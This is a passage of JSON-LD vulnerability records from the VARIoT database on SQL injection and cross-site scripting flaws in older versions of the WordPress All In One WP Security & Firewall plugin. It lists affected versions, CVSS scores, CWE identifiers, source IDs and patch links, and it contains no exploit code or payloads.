              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1073

    Vulnerability from variot - Updated: 2024-11-23 23:01

    The all-in-one-wp-security-and-firewall plugin before 4.0.7 for WordPress has multiple SQL injection issues. The all-in-one-wp-security-and-firewall plugin for WordPress contains an SQL injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The vulnerability stems from a lack of verification of externally supplied input used in SQL statements in a database-backed application. Attackers can exploit this vulnerability to execute unauthorized SQL commands.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1073",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.7"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          }
        ]
      },
      "cve": "CVE-2016-10888",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2016-10888",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-89709",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2016-10888",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10888",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10888",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-1057",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89709",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.7 for WordPress has multiple SQL injection issues. The all-in-one-wp-security-and-firewall plugin for WordPress contains an SQL injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The vulnerability stems from a lack of validation of externally supplied SQL statements in database-backed applications. Attackers can exploit this vulnerability to execute illegal SQL commands.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10888",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89709",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "id": "VAR-201908-1073",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:01:42.825000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "Remediation for the WordPress all-in-one-wp-security-and-firewall plugin SQL injection vulnerability",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96734"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10888"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10888"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "date": "2019-08-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "date": "2019-08-14T16:15:12.033000",
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89709"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          },
          {
            "date": "2019-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          },
          {
            "date": "2024-11-21T02:44:59.720000",
            "db": "NVD",
            "id": "CVE-2016-10888"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection vulnerability in the all-in-one-wp-security-and-firewall plugin for WordPress",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007796"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1057"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1203

    Vulnerability from variot - Updated: 2024-11-23 22:58

    The all-in-one-wp-security-and-firewall plugin before 3.9.5 for WordPress has XSS in add_query_arg and remove_query_arg function instances. The all-in-one-wp-security-and-firewall plug-in for WordPress contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute client-side code.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1203",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "3.9.5"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.9.5"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          }
        ]
      },
      "cve": "CVE-2015-9294",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2015-9294",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-87255",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2015-9294",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-9294",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-9294",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-841",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-87255",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 3.9.5 for WordPress has XSS in add_query_arg and remove_query_arg function instances. The all-in-one-wp-security-and-firewall plug-in for WordPress contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute client-side code.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-9294",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-87255",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "id": "VAR-201908-1203",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T22:58:36.462000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96532"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9294"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-9294"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "date": "2019-08-13T17:15:11.687000",
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87255"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          },
          {
            "date": "2024-11-21T02:40:16.507000",
            "db": "NVD",
            "id": "CVE-2015-9294"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007700"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-841"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1125

    Vulnerability from variot - Updated: 2024-11-23 22:29

    The all-in-one-wp-security-and-firewall plugin before 4.0.5 for WordPress has XSS in the blacklist, file system, and file change detection settings pages. The all-in-one-wp-security-and-firewall plugin for WordPress contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client-supplied data in the web application. An attacker could exploit this vulnerability to execute client-side code.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1125",
      "affected_products": {
        "@context": {
